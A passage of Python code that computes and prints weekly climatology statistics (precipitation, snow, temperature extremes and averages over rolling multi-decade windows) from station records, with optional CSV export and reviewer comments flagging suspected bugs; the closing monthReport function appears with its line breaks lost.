    #valid_yrs = [x for x in clmt.keys() if type(x) == int]
    valid_yrs.sort()
    # One accumulator dict per climatology window (keyed by (start_year, end_year)).
    # Sentinels: -1 (precip/snow maxima) and -999/999 (temperature extremes) are
    # placeholders guaranteed to be replaced by the first real observation.
    climo30yrs = {}
    for x in range(1811,max(valid_yrs)+1,increment):
        if x in range(valid_yrs[0],valid_yrs[len(valid_yrs)-1]) and x+climatology-1 in range(valid_yrs[0],valid_yrs[len(valid_yrs)-1]+1):
            climo30yrs[(x,x+climatology-1)] = {"years":(x,x+climatology-1),"total_days":0,
                "prcp": [],"prcpPROP":{"days":0,"week_max":[-1,[]]},
                "snow": [],"snowPROP":{"days":0,"week_max":[-1,[]]},
                "tempAVGlist": [],"tempAVGlist_ind":[],"tavgPROP":{"week_max":[-999,[]],"week_min":[999,[]]},
                "tmax": [],"tmaxPROP":{"week_max":[-999,[]],"week_min":[999,[]]},
                "tmin": [],"tminPROP":{"week_max":[-999,[]],"week_min":[999,[]]}}
    # Accumulator covering the entire period of record.
    alltime = {"years":(valid_yrs[0],valid_yrs[len(valid_yrs)-1]),"total_days":0,
        "prcp": [],"prcpPROP":{"days":0,"week_max":[-1,[]]},
        "snow": [],"snowPROP":{"days":0,"week_max":[-1,[]]},
        "tempAVGlist": [],"tempAVGlist_ind":[],"tavgPROP":{"week_max":[-999,[]],"week_min":[999,[]]},
        "tmax": [],"tmaxPROP":{"week_max":[-999,[]],"week_min":[999,[]]},
        "tmin": [],"tminPROP":{"week_max":[-999,[]],"week_min":[999,[]]}}
    # Leap-day center is shifted to Feb 28 so datetime.date(y,2,29) never raises.
    if m == 2 and d == 29: d = 28
    for y in valid_yrs:
        wkstart = datetime.date(y,m,d) - datetime.timedelta(days=3)
        currday = wkstart
        wkend = datetime.date(y,m,d) + datetime.timedelta(days=3)
        wk = []
        wk_prcp = []
        wk_snow = []
        wk_tempAVGlist = []
        wk_tmax = []
        wk_tmin = []
        # Collect the 7 day-records centered on (m, d); missing days are skipped
        # (the bare except absorbs KeyError for dates absent from clmt).
        for DAY in range(7):
            try:
                wk.append(clmt[currday.year][currday.month][currday.day])
                currday += datetime.timedelta(days=1)
            except:
                currday += datetime.timedelta(days=1)
        alltime["total_days"] += len(wk)
        for c in climo30yrs:
            if y >= c[0] and y <= c[1] and c[0] in clmt and c[1] in clmt:
                climo30yrs[c]["total_days"] += len(wk)
        if len(wk) > 0:
            # --- per-day accumulation (only days passing QC flags / sentinel checks) ---
            for day in wk:
                if day.prcpQ in ignoreflags and day.prcp not in ["9999","-9999",""]:
                    #alltime["prcp"].append(float(day.prcp))
                    if float(day.prcp) > 0 or day.prcpM == "T":
                        alltime["prcpPROP"]["days"] += 1
                    # NOTE(review): reconstructed nesting — assumed unconditional
                    # (matches the tmax/tmin pattern below); confirm it was not
                    # inside the wet-day `if` in the original layout.
                    wk_prcp.append(float(day.prcp))
                    for c in climo30yrs:
                        if y >= c[0] and y <= c[1] and c[0] >= min(YR for YR in clmt if type(YR) == int) and c[1] <= max(YR for YR in clmt if type(YR) == int):
                            #climo30yrs[c]["prcp"].append(float(day.prcp))
                            if float(day.prcp) > 0 or day.prcpM == "T":
                                climo30yrs[c]["prcpPROP"]["days"] += 1
                if day.snowQ in ignoreflags and day.snow not in ["9999","-9999",""]:
                    # NOTE(review): unlike prcp, the per-day append here is NOT
                    # commented out, yet alltime["snow"] also receives weekly
                    # sums below — the list mixes daily values and weekly totals.
                    # Verify this is intentional.
                    alltime["snow"].append(float(day.snow))
                    if float(day.snow) > 0 or day.snowM == "T":
                        alltime["snowPROP"]["days"] += 1
                    wk_snow.append(float(day.snow))
                    for c in climo30yrs:
                        if y >= c[0] and y <= c[1] and c[0] >= min(YR for YR in clmt if type(YR) == int) and c[1] <= max(YR for YR in clmt if type(YR) == int):
                            #climo30yrs[c]["snow"].append(float(day.snow))
                            if float(day.snow) > 0 or day.snowM == "T":
                                climo30yrs[c]["snowPROP"]["days"] += 1
                # Average temperature needs BOTH tmax and tmin to pass QC.
                if day.tmaxQ in ignoreflags and day.tmax not in ["9999","-9999",""] and day.tminQ in ignoreflags and day.tmin not in ["9999","-9999",""]:
                    alltime["tempAVGlist_ind"].append(int(day.tmax))
                    alltime["tempAVGlist_ind"].append(int(day.tmin))
                    wk_tempAVGlist.append(int(day.tmax))
                    wk_tempAVGlist.append(int(day.tmin))
                    for c in climo30yrs:
                        if y >= c[0] and y <= c[1] and c[0] >= min(YR for YR in clmt if type(YR) == int) and c[1] <= max(YR for YR in clmt if type(YR) == int):
                            climo30yrs[c]["tempAVGlist_ind"].append(int(day.tmax))
                            climo30yrs[c]["tempAVGlist_ind"].append(int(day.tmin))
                if day.tmaxQ in ignoreflags and day.tmax not in ["9999","-9999",""]:
                    alltime["tmax"].append(int(day.tmax))
                    wk_tmax.append(int(day.tmax))
                    for c in climo30yrs:
                        if y >= c[0] and y <= c[1] and c[0] >= min(YR for YR in clmt if type(YR) == int) and c[1] <= max(YR for YR in clmt if type(YR) == int):
                            climo30yrs[c]["tmax"].append(int(day.tmax))
                if day.tminQ in ignoreflags and day.tmin not in ["9999","-9999",""]:
                    alltime["tmin"].append(int(day.tmin))
                    wk_tmin.append(int(day.tmin))
                    for c in climo30yrs:
                        if y >= c[0] and y <= c[1] and c[0] >= min(YR for YR in clmt if type(YR) == int) and c[1] <= max(YR for YR in clmt if type(YR) == int):
                            climo30yrs[c]["tmin"].append(int(day.tmin))
            # --- week-level accumulation for this year ---
            alltime["prcp"].append(sum(wk_prcp))
            alltime["snow"].append(sum(wk_snow))
            if len(wk_tempAVGlist) > excludeweek_tavg:
                # NOTE(review): this same append is repeated a few lines below,
                # so each qualifying week's mean lands in tempAVGlist twice
                # (pstdev/mean of a uniformly duplicated list are unchanged,
                # but the duplication looks unintentional — confirm).
                alltime["tempAVGlist"].append(round(mean(wk_tempAVGlist),1))
            # CLIMO STATS HERE ON THIS LEVEL
            # Record pattern used throughout: == ties append the year to the
            # tie list; a new extreme replaces the value and resets the list.
            if sum(wk_prcp) == alltime["prcpPROP"]["week_max"][0]:
                alltime["prcpPROP"]["week_max"][1].append(y)
            elif sum(wk_prcp) > alltime["prcpPROP"]["week_max"][0]:
                alltime["prcpPROP"]["week_max"][0] = sum(wk_prcp)
                alltime["prcpPROP"]["week_max"][1] = []
                alltime["prcpPROP"]["week_max"][1].append(y)
            if sum(wk_snow) == alltime["snowPROP"]["week_max"][0]:
                alltime["snowPROP"]["week_max"][1].append(y)
            elif sum(wk_snow) > alltime["snowPROP"]["week_max"][0]:
                alltime["snowPROP"]["week_max"][0] = sum(wk_snow)
                alltime["snowPROP"]["week_max"][1] = []
                alltime["snowPROP"]["week_max"][1].append(y)
            # "tempAVGlist": [],"tempAVGlist_ind":[],"tavgPROP":{"week_max":[-999,[]],"week_min":[999,[]]},
            if len(wk_tempAVGlist) > excludeweek_tavg:
                alltime["tempAVGlist"].append(round(mean(wk_tempAVGlist),1))
                if round(mean(wk_tempAVGlist),1) == alltime["tavgPROP"]["week_max"][0]:
                    alltime["tavgPROP"]["week_max"][1].append(y)
                elif round(mean(wk_tempAVGlist),1) > alltime["tavgPROP"]["week_max"][0]:
                    # NOTE(review): week_max stores the unrounded mean while
                    # week_min stores the rounded one — inconsistent; verify.
                    alltime["tavgPROP"]["week_max"][0] = mean(wk_tempAVGlist)
                    alltime["tavgPROP"]["week_max"][1] = []
                    alltime["tavgPROP"]["week_max"][1].append(y)
                if round(mean(wk_tempAVGlist),1) == alltime["tavgPROP"]["week_min"][0]:
                    alltime["tavgPROP"]["week_min"][1].append(y)
                elif round(mean(wk_tempAVGlist),1) < alltime["tavgPROP"]["week_min"][0]:
                    alltime["tavgPROP"]["week_min"][0] = round(mean(wk_tempAVGlist),1)
                    alltime["tavgPROP"]["week_min"][1] = []
                    alltime["tavgPROP"]["week_min"][1].append(y)
            # Weeks with too few valid observations (<= excludeweek) are skipped.
            if len(wk_tmax) > excludeweek:
                if mean(wk_tmax) == alltime["tmaxPROP"]["week_max"][0]:
                    alltime["tmaxPROP"]["week_max"][1].append(y)
                elif mean(wk_tmax) > alltime["tmaxPROP"]["week_max"][0]:
                    alltime["tmaxPROP"]["week_max"][0] = mean(wk_tmax)
                    alltime["tmaxPROP"]["week_max"][1] = []
                    alltime["tmaxPROP"]["week_max"][1].append(y)
                if mean(wk_tmax) == alltime["tmaxPROP"]["week_min"][0]:
                    alltime["tmaxPROP"]["week_min"][1].append(y)
                elif mean(wk_tmax) < alltime["tmaxPROP"]["week_min"][0]:
                    alltime["tmaxPROP"]["week_min"][0] = mean(wk_tmax)
                    alltime["tmaxPROP"]["week_min"][1] = []
                    alltime["tmaxPROP"]["week_min"][1].append(y)
            if len(wk_tmin) > excludeweek:
                if mean(wk_tmin) == alltime["tminPROP"]["week_max"][0]:
                    alltime["tminPROP"]["week_max"][1].append(y)
                elif mean(wk_tmin) > alltime["tminPROP"]["week_max"][0]:
                    alltime["tminPROP"]["week_max"][0] = mean(wk_tmin)
                    alltime["tminPROP"]["week_max"][1] = []
                    alltime["tminPROP"]["week_max"][1].append(y)
                if mean(wk_tmin) == alltime["tminPROP"]["week_min"][0]:
                    alltime["tminPROP"]["week_min"][1].append(y)
                elif mean(wk_tmin) < alltime["tminPROP"]["week_min"][0]:
                    alltime["tminPROP"]["week_min"][0] = mean(wk_tmin)
                    alltime["tminPROP"]["week_min"][1] = []
                    alltime["tminPROP"]["week_min"][1].append(y)
            # --- same week-level bookkeeping, per climatology window ---
            for c in climo30yrs:
                if y >= c[0] and y <= c[1] and c[0] >= min(YR for YR in clmt if type(YR) == int) and c[1] <= max(YR for YR in clmt if type(YR) == int):
                    climo30yrs[c]["prcp"].append(sum(wk_prcp))
                    climo30yrs[c]["snow"].append(sum(wk_snow))
                    if sum(wk_prcp) == climo30yrs[c]["prcpPROP"]["week_max"][0]:
                        climo30yrs[c]["prcpPROP"]["week_max"][1].append(y)
                    elif sum(wk_prcp) > climo30yrs[c]["prcpPROP"]["week_max"][0]:
                        climo30yrs[c]["prcpPROP"]["week_max"][0] = sum(wk_prcp)
                        climo30yrs[c]["prcpPROP"]["week_max"][1] = []
                        climo30yrs[c]["prcpPROP"]["week_max"][1].append(y)
                    if sum(wk_snow) == climo30yrs[c]["snowPROP"]["week_max"][0]:
                        climo30yrs[c]["snowPROP"]["week_max"][1].append(y)
                    elif sum(wk_snow) > climo30yrs[c]["snowPROP"]["week_max"][0]:
                        climo30yrs[c]["snowPROP"]["week_max"][0] = sum(wk_snow)
                        climo30yrs[c]["snowPROP"]["week_max"][1] = []
                        climo30yrs[c]["snowPROP"]["week_max"][1].append(y)
                    if len(wk_tempAVGlist) > excludeweek_tavg:
                        climo30yrs[c]["tempAVGlist"].append(round(mean(wk_tempAVGlist),1))
                        if round(mean(wk_tempAVGlist),1) == climo30yrs[c]["tavgPROP"]["week_max"][0]:
                            climo30yrs[c]["tavgPROP"]["week_max"][1].append(y)
                        elif round(mean(wk_tempAVGlist),1) > climo30yrs[c]["tavgPROP"]["week_max"][0]:
                            climo30yrs[c]["tavgPROP"]["week_max"][0] = mean(wk_tempAVGlist)
                            climo30yrs[c]["tavgPROP"]["week_max"][1] = []
                            climo30yrs[c]["tavgPROP"]["week_max"][1].append(y)
                        if round(mean(wk_tempAVGlist),1) == climo30yrs[c]["tavgPROP"]["week_min"][0]:
                            climo30yrs[c]["tavgPROP"]["week_min"][1].append(y)
                        elif round(mean(wk_tempAVGlist),1) < climo30yrs[c]["tavgPROP"]["week_min"][0]:
                            climo30yrs[c]["tavgPROP"]["week_min"][0] = round(mean(wk_tempAVGlist),1)
                            climo30yrs[c]["tavgPROP"]["week_min"][1] = []
                            climo30yrs[c]["tavgPROP"]["week_min"][1].append(y)
                    if len(wk_tmax) > excludeweek:
                        if mean(wk_tmax) == climo30yrs[c]["tmaxPROP"]["week_max"][0]:
                            climo30yrs[c]["tmaxPROP"]["week_max"][1].append(y)
                        elif mean(wk_tmax) > climo30yrs[c]["tmaxPROP"]["week_max"][0]:
                            climo30yrs[c]["tmaxPROP"]["week_max"][0] = mean(wk_tmax)
                            climo30yrs[c]["tmaxPROP"]["week_max"][1] = []
                            climo30yrs[c]["tmaxPROP"]["week_max"][1].append(y)
                        if mean(wk_tmax) == climo30yrs[c]["tmaxPROP"]["week_min"][0]:
                            climo30yrs[c]["tmaxPROP"]["week_min"][1].append(y)
                        elif mean(wk_tmax) < climo30yrs[c]["tmaxPROP"]["week_min"][0]:
                            climo30yrs[c]["tmaxPROP"]["week_min"][0] = mean(wk_tmax)
                            climo30yrs[c]["tmaxPROP"]["week_min"][1] = []
                            climo30yrs[c]["tmaxPROP"]["week_min"][1].append(y)
                    if len(wk_tmin) > excludeweek:
                        if mean(wk_tmin) == climo30yrs[c]["tminPROP"]["week_max"][0]:
                            climo30yrs[c]["tminPROP"]["week_max"][1].append(y)
                        elif mean(wk_tmin) > climo30yrs[c]["tminPROP"]["week_max"][0]:
                            climo30yrs[c]["tminPROP"]["week_max"][0] = mean(wk_tmin)
                            climo30yrs[c]["tminPROP"]["week_max"][1] = []
                            climo30yrs[c]["tminPROP"]["week_max"][1].append(y)
                        if mean(wk_tmin) == climo30yrs[c]["tminPROP"]["week_min"][0]:
                            climo30yrs[c]["tminPROP"]["week_min"][1].append(y)
                        elif mean(wk_tmin) < climo30yrs[c]["tminPROP"]["week_min"][0]:
                            climo30yrs[c]["tminPROP"]["week_min"][0] = mean(wk_tmin)
                            climo30yrs[c]["tminPROP"]["week_min"][1] = []
                            climo30yrs[c]["tminPROP"]["week_min"][1].append(y)
    # Year 1999 is only a dummy (non-leap) year used to render month/day labels;
    # NOTE(review): wkend is NOT recomputed here and still holds the value from
    # the last loop iteration — confirm the header dates print as intended.
    wkstart = datetime.date(1999,m,d) - datetime.timedelta(days=3)
    currday = wkstart
    # PRINT REPORT
    print("--------------------------------------------------")
    print("Climatology Report for the Week of {:%b} {:%d} - {:%b} {:%d}".format(wkstart,wkstart,wkend,wkend))
    print("City: {}, {}".format(clmt["station"],clmt["station_name"]))
    print("{}-{}; {}-Year Incremented {}-Year Climatologies".format(min(valid_yrs),max(valid_yrs),increment,climatology))
    print("--------------------------------------------------")
    print("\nPart 1: Precipitation Stats")
    print("{:▒^9} {:▒^11} {:▒^6} {:▒^12} {:▒^11} {:▒^6} {:▒^12}".format("Years","PRCP","PRCP","PRCP","SNOW","SNOW","SNOW"))
    print("{:▒^9} {:▒^11} {:▒^6} {:▒^12} {:▒^11} {:▒^6} {:▒^12}".format("","DAYS","AVG", "MAX","DAYS","AVG", "MAX"))
    # Y PD PA PM SD SA SM
    print("{:-^9} {:-^11} {:-^6} {:-^12} {:-^11} {:-^6} {:-^12}".format("","","","","","",""))
    # Tie lists render as a count when >1 year shares the record, else the year.
    print("{:^9} {:4}:{:>5}% {:^6.2f} {:>5.2f}, {:^5} {:4}:{:>5}% {:^6.1f} {:>5.1f}, {:^5}".format("All Time",
        alltime["prcpPROP"]["days"],
        round(100 * alltime["prcpPROP"]["days"] / alltime["total_days"],1),
        round(mean(alltime["prcp"]),2),
        round(alltime["prcpPROP"]["week_max"][0],2),
        alltime["prcpPROP"]["week_max"][1][0] if len(alltime["prcpPROP"]["week_max"][1]) == 1 else len(alltime["prcpPROP"]["week_max"][1]),
        alltime["snowPROP"]["days"],
        round(100 * alltime["snowPROP"]["days"] / alltime["total_days"],1),
        round(mean(alltime["snow"]),1),
        round(alltime["snowPROP"]["week_max"][0],2),
        alltime["snowPROP"]["week_max"][1][0] if len(alltime["snowPROP"]["week_max"][1]) == 1 else len(alltime["snowPROP"]["week_max"][1])))
    for c in climo30yrs:
        try:
            print("{:^9} {:4}:{:>5}% {:^6.2f} {:>5.2f}, {:^5} {:4}:{:>5}% {:^6.1f} {:>5.1f}, {:^5}".format(str(climo30yrs[c]["years"][0])+"-"+str(climo30yrs[c]["years"][1]),
                climo30yrs[c]["prcpPROP"]["days"],
                round(100 * climo30yrs[c]["prcpPROP"]["days"] / climo30yrs[c]["total_days"],1),
                round(mean(climo30yrs[c]["prcp"]),2),
                round(climo30yrs[c]["prcpPROP"]["week_max"][0],2),
                climo30yrs[c]["prcpPROP"]["week_max"][1][0] if len(climo30yrs[c]["prcpPROP"]["week_max"][1]) == 1 else len(climo30yrs[c]["prcpPROP"]["week_max"][1]),
                climo30yrs[c]["snowPROP"]["days"],
                round(100 * climo30yrs[c]["snowPROP"]["days"] / climo30yrs[c]["total_days"],1),
                round(mean(climo30yrs[c]["snow"]),1),
                round(climo30yrs[c]["snowPROP"]["week_max"][0],2),
                climo30yrs[c]["snowPROP"]["week_max"][1][0] if len(climo30yrs[c]["snowPROP"]["week_max"][1]) == 1 else len(climo30yrs[c]["snowPROP"]["week_max"][1])))
        except:
            # Windows with empty lists (mean/pstdev would raise) are skipped silently.
            pass
    print("\nPart 2: Temperature Stats")
    print("{:▒^9} {:▒^37} | {:▒^37} | {:▒^37}".format("Years","AVG TEMP","TMAX","TMIN"))
    print("{:▒^9} {:▒<5} {:▒^5} {:▒^12} {:▒^12} | {:▒<5} {:▒^5} {:▒^12} {:▒^12} | {:▒<5} {:▒^5} {:▒^12} {:▒^12}".format("","STDEV","AVG","MAX","MIN","STDEV","AVG","MAX","MIN","STDEV","AVG","MAX","MIN"))
    # Y TSTDV TMA TMX TMn TSTDV TMA TMX TMn TSTDV TMA TMX TMn
    # "tempAVGlist": [],"tavgPROP":{"week_max":[-999,[]],"week_min":[999,[]]},
    print("{:-^9} {:-^5} {:-^5} {:-^12} {:-^12} | {:-^5} {:-^5} {:-^12} {:-^12} | {:-^5} {:-^5} {:-^12} {:-^12}".format("","","","","","","","","","","","",""))
    print("{:^9} {:^5.1f} {:^5.1f} {:>5.1f}, {:^5} {:>5.1f}, {:^5} | {:^5.1f} {:^5.1f} {:>5.1f}, {:^5} {:>5.1f}, {:^5} | {:^5.1f} {:^5.1f} {:>5.1f}, {:^5} {:>5.1f}, {:^5}".format("All Time",
        round(pstdev(alltime["tempAVGlist"]),1),
        round(mean(alltime["tempAVGlist_ind"]),1),
        round(alltime["tavgPROP"]["week_max"][0],1),
        alltime["tavgPROP"]["week_max"][1][0] if len(alltime["tavgPROP"]["week_max"][1]) == 1 else len(alltime["tavgPROP"]["week_max"][1]),
        round(alltime["tavgPROP"]["week_min"][0],1),
        alltime["tavgPROP"]["week_min"][1][0] if len(alltime["tavgPROP"]["week_min"][1]) == 1 else len(alltime["tavgPROP"]["week_min"][1]),
        round(pstdev(alltime["tmax"]),1),
        round(mean(alltime["tmax"]),1),
        round(alltime["tmaxPROP"]["week_max"][0],1),
        alltime["tmaxPROP"]["week_max"][1][0] if len(alltime["tmaxPROP"]["week_max"][1]) == 1 else len(alltime["tmaxPROP"]["week_max"][1]),
        round(alltime["tmaxPROP"]["week_min"][0],1),
        alltime["tmaxPROP"]["week_min"][1][0] if len(alltime["tmaxPROP"]["week_min"][1]) == 1 else len(alltime["tmaxPROP"]["week_min"][1]),
        round(pstdev(alltime["tmin"]),1),
        round(mean(alltime["tmin"]),1),
        round(alltime["tminPROP"]["week_max"][0],1),
        alltime["tminPROP"]["week_max"][1][0] if len(alltime["tminPROP"]["week_max"][1]) == 1 else len(alltime["tminPROP"]["week_max"][1]),
        round(alltime["tminPROP"]["week_min"][0],1),
        alltime["tminPROP"]["week_min"][1][0] if len(alltime["tminPROP"]["week_min"][1]) == 1 else len(alltime["tminPROP"]["week_min"][1])))
    for c in climo30yrs:
        try:
            print("{:^9} {:^5.1f} {:^5.1f} {:>5.1f}, {:^5} {:>5.1f}, {:^5} | {:^5.1f} {:^5.1f} {:>5.1f}, {:^5} {:>5.1f}, {:^5} | {:^5.1f} {:^5.1f} {:>5.1f}, {:^5} {:>5.1f}, {:^5}".format(str(climo30yrs[c]["years"][0])+"-"+str(climo30yrs[c]["years"][1]),
                round(pstdev(climo30yrs[c]["tempAVGlist"]),1),
                round(mean(climo30yrs[c]["tempAVGlist_ind"]),1),
                round(climo30yrs[c]["tavgPROP"]["week_max"][0],1),
                climo30yrs[c]["tavgPROP"]["week_max"][1][0] if len(climo30yrs[c]["tavgPROP"]["week_max"][1]) == 1 else len(climo30yrs[c]["tavgPROP"]["week_max"][1]),
                round(climo30yrs[c]["tavgPROP"]["week_min"][0],1),
                climo30yrs[c]["tavgPROP"]["week_min"][1][0] if len(climo30yrs[c]["tavgPROP"]["week_min"][1]) == 1 else len(climo30yrs[c]["tavgPROP"]["week_min"][1]),
                round(pstdev(climo30yrs[c]["tmax"]),1),
                round(mean(climo30yrs[c]["tmax"]),1),
                round(climo30yrs[c]["tmaxPROP"]["week_max"][0],1),
                climo30yrs[c]["tmaxPROP"]["week_max"][1][0] if len(climo30yrs[c]["tmaxPROP"]["week_max"][1]) == 1 else len(climo30yrs[c]["tmaxPROP"]["week_max"][1]),
                round(climo30yrs[c]["tmaxPROP"]["week_min"][0],1),
                climo30yrs[c]["tmaxPROP"]["week_min"][1][0] if len(climo30yrs[c]["tmaxPROP"]["week_min"][1]) == 1 else len(climo30yrs[c]["tmaxPROP"]["week_min"][1]),
                round(pstdev(climo30yrs[c]["tmin"]),1),
                round(mean(climo30yrs[c]["tmin"]),1),
                round(climo30yrs[c]["tminPROP"]["week_max"][0],1),
                climo30yrs[c]["tminPROP"]["week_max"][1][0] if len(climo30yrs[c]["tminPROP"]["week_max"][1]) == 1 else len(climo30yrs[c]["tminPROP"]["week_max"][1]),
                round(climo30yrs[c]["tminPROP"]["week_min"][0],1),
                climo30yrs[c]["tminPROP"]["week_min"][1][0] if len(climo30yrs[c]["tminPROP"]["week_min"][1]) == 1 else len(climo30yrs[c]["tminPROP"]["week_min"][1])))
        except Exception as e:
            print("ERROR: Era = {}; Exception = {}".format(c,e))
    print("")
    # Optional CSV export of the same statistics, one row per assessed period.
    if output == True:
        newfn = "weekReport_centered_" + str(calendar.month_abbr[m]) + str(d) + "_" + str(climatology) + "YRclimo_" + str(increment) + "YRincr_" + clmt["station_name"] + ".csv"
        with open(newfn,"w") as w:
            headers = ["Assessed Period ({}-{} thru {}-{})".format(wkstart.month,wkstart.day,wkend.month,wkend.day),"PRCP Days","PRCP % of days","PRCP stdev","PRCP AVG","SNOW Days","SNOW % of days","SNOW stdev","SNOW AVG","TAVG stdev","TAVG","TMAX stdev","TMAX","TMIN stdev","TMIN"]
            # HEADER
            for x in range(len(headers)):
                if x != len(headers) - 1:
                    w.write(headers[x]); w.write(",")
                else:
                    w.write(headers[x]); w.write("\n")
            # All-time row
            w.write("{}-{}".format(alltime["years"][0],alltime["years"][1])); w.write(",")
            w.write("{}".format(alltime["prcpPROP"]["days"])); w.write(",")
            w.write("{:.1f}".format(round(100 * alltime["prcpPROP"]["days"] / alltime["total_days"],1))); w.write(",")
            w.write("{:.1f}".format(round(pstdev(alltime["prcp"]),1))); w.write(",")
            w.write("{:.1f}".format(round(mean(alltime["prcp"]),1))); w.write(",")
            w.write("{}".format(alltime["snowPROP"]["days"])); w.write(",")
            w.write("{:.1f}".format(round(100 * alltime["snowPROP"]["days"] / alltime["total_days"],1))); w.write(",")
            w.write("{:.1f}".format(round(pstdev(alltime["snow"]),1))); w.write(",")
            w.write("{:.1f}".format(round(mean(alltime["snow"]),1))); w.write(",")
            w.write("{:.1f}".format(round(pstdev(alltime["tempAVGlist"]),1))); w.write(",")
            w.write("{:.1f}".format(round(mean(alltime["tempAVGlist_ind"]),1))); w.write(",")
            w.write("{:.1f}".format(round(pstdev(alltime["tmax"]),1))); w.write(",")
            w.write("{:.1f}".format(round(mean(alltime["tmax"]),1))); w.write(",")
            w.write("{:.1f}".format(round(pstdev(alltime["tmin"]),1))); w.write(",")
            w.write("{:.1f}".format(round(mean(alltime["tmin"]),1))); w.write("\n")
            # One row per climatology window
            for x in climo30yrs:
                w.write("{}-{}".format(climo30yrs[x]["years"][0],climo30yrs[x]["years"][1])); w.write(",")
                w.write("{}".format(climo30yrs[x]["prcpPROP"]["days"])); w.write(",")
                w.write("{:.1f}".format(round(100 * climo30yrs[x]["prcpPROP"]["days"] / climo30yrs[x]["total_days"],1))); w.write(",")
                w.write("{:.1f}".format(round(pstdev(climo30yrs[x]["prcp"]),1))); w.write(",")
                w.write("{:.1f}".format(round(mean(climo30yrs[x]["prcp"]),1))); w.write(",")
                w.write("{}".format(climo30yrs[x]["snowPROP"]["days"])); w.write(",")
                w.write("{:.1f}".format(round(100 * climo30yrs[x]["snowPROP"]["days"] / climo30yrs[x]["total_days"],1))); w.write(",")
                w.write("{:.1f}".format(round(pstdev(climo30yrs[x]["snow"]),1))); w.write(",")
                w.write("{:.1f}".format(round(mean(climo30yrs[x]["snow"]),1))); w.write(",")
                w.write("{:.1f}".format(round(pstdev(climo30yrs[x]["tempAVGlist"]),1))); w.write(",")
                w.write("{:.1f}".format(round(mean(climo30yrs[x]["tempAVGlist_ind"]),1))); w.write(",")
                w.write("{:.1f}".format(round(pstdev(climo30yrs[x]["tmax"]),1))); w.write(",")
                w.write("{:.1f}".format(round(mean(climo30yrs[x]["tmax"]),1))); w.write(",")
                w.write("{:.1f}".format(round(pstdev(climo30yrs[x]["tmin"]),1))); w.write(",")
                w.write("{:.1f}".format(round(mean(climo30yrs[x]["tmin"]),1))); w.write("\n")
        print("*** csv output successful ***")

def monthReport(m,climatology=30,increment=5,output=False):
    """Detailed Climatological Report for a given month Args (Required): m: month (int) Keyword Args (optional): climatology = 30: The span of years that averages
are calculated for (ie. '30 year climatology' or '30 year average'). This can be modified but should always be > the increment. increment = 5: Tells the script how often to assess/record successive climatologies. The smaller this is, the longer the report takes to generate. If kept at the default, for example, it would capture the 1976-2005, 1981-2010, and 1986-2015 climatologies and so forth. output = False: If set to True, the script will output a CSV file of its findings. This could be opened in a spreadsheet program for further analysis Examples: monthReport(10) -> Returns a 30-yr, 5-yr incremented climatological report for the month of October. monthReport(12,climatology=10) -> Returns a 10-yr, 5-yr incremented climatological report for December. monthReport(3,climatology=20,increment=1,output=True) -> Returns a 1-yr incremented, 20yr climatology report for March and outputs a CSV. """ valid_yrs = list(range(min([x for x in clmt.keys() if type(x) == int]),max([x for x in clmt.keys() if type(x) == int])+1)) #valid_yrs = [x for x in clmt.keys() if type(x) == int] valid_yrs.sort() climo30yrs = {} for x in range(1811,max(valid_yrs)+1,increment): if x in range(valid_yrs[0],valid_yrs[len(valid_yrs)-1]) and x+climatology-1 in range(valid_yrs[0],valid_yrs[len(valid_yrs)-1]+1): climo30yrs[(x,x+climatology-1)] = {"years":(x,x+climatology-1),"total_days":0, "prcp": [],"prcpPROP":{"days":0,"month_max_days":[-1,[]],"month_min_days":[999,[]],"month_max":[-1,[]],"month_min":[999,[]]}, "snow": [],"snowPROP":{"days":0,"month_max_days":[-1,[]],"month_max":[-1,[]]}, "tempAVGlist": [],"tempAVGlist_ind":[],"tavgPROP":{"month_max":[-999,[]],"month_min":[999,[]]}, "tmax": [],"tmaxPROP":{"month_max":[-999,[]],"month_min":[999,[]]}, "tmin": [],"tminPROP":{"month_max":[-999,[]],"month_min":[999,[]]}} alltime = {"years":(valid_yrs[0],valid_yrs[len(valid_yrs)-1]),"total_days":0, "prcp": 
[],"prcpPROP":{"days":0,"month_max_days":[-1,[]],"month_min_days":[999,[]],"month_max":[-1,[]],"month_min":[999,[]]}, "snow": [],"snowPROP":{"days":0,"month_max_days":[-1,[]],"month_max":[-1,[]]}, "tempAVGlist": [],"tempAVGlist_ind":[],"tavgPROP":{"month_max":[-999,[]],"month_min":[999,[]]}, "tmax": [],"tmaxPROP":{"month_max":[-999,[]],"month_min":[999,[]]}, "tmin": [],"tminPROP":{"month_max":[-999,[]],"month_min":[999,[]]}} # 'recordqty', 'prcp', 'prcpDAYS', 'prcpPROP', 'snow', 'snowDAYS', 'snowPROP', 'tempAVGlist', 'tmax', 'tmaxPROP', 'tmin', 'tminPROP' for y in valid_yrs: if y in clmt and m in clmt[y]: alltime["total_days"] += clmt[y][m]["recordqty"] # PRCP alltime["prcp"].append(sum(clmt[y][m]["prcp"])) alltime["prcpPROP"]["days"] += clmt[y][m]["prcpDAYS"] if clmt[y][m]["prcpDAYS"] == alltime["prcpPROP"]["month_max_days"][0]: alltime["prcpPROP"]["month_max_days"][1].append(y) elif clmt[y][m]["prcpDAYS"] > alltime["prcpPROP"]["month_max_days"][0]: alltime["prcpPROP"]["month_max_days"][0] = clmt[y][m]["prcpDAYS"] alltime["prcpPROP"]["month_max_days"][1] = [] alltime["prcpPROP"]["month_max_days"][1].append(y) if sum(clmt[y][m]["prcp"]) == alltime["prcpPROP"]["month_max"][0]: alltime["prcpPROP"]["month_max"][1].append(y) elif sum(clmt[y][m]["prcp"]) > alltime["prcpPROP"]["month_max"][0]: alltime["prcpPROP"]["month_max"][0] = sum(clmt[y][m]["prcp"]) alltime["prcpPROP"]["month_max"][1] = [] alltime["prcpPROP"]["month_max"][1].append(y) if clmt[y][m]["recordqty"] > excludemonth: if clmt[y][m]["prcpDAYS"] == alltime["prcpPROP"]["month_min_days"][0]: alltime["prcpPROP"]["month_min_days"][1].append(y) elif clmt[y][m]["prcpDAYS"] < alltime["prcpPROP"]["month_min_days"][0]: alltime["prcpPROP"]["month_min_days"][0] = clmt[y][m]["prcpDAYS"] alltime["prcpPROP"]["month_min_days"][1] = [] alltime["prcpPROP"]["month_min_days"][1].append(y) if sum(clmt[y][m]["prcp"]) == alltime["prcpPROP"]["month_min"][0]: alltime["prcpPROP"]["month_min"][1].append(y) elif sum(clmt[y][m]["prcp"]) 
